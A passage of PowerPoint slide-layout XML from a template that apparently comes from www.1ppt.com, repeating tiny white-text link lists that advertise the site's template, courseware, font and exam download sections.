              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout102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02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02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02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0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03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03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03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03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03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03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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout103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03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03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03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0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04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04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04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04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04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04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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout104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04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04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04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0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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
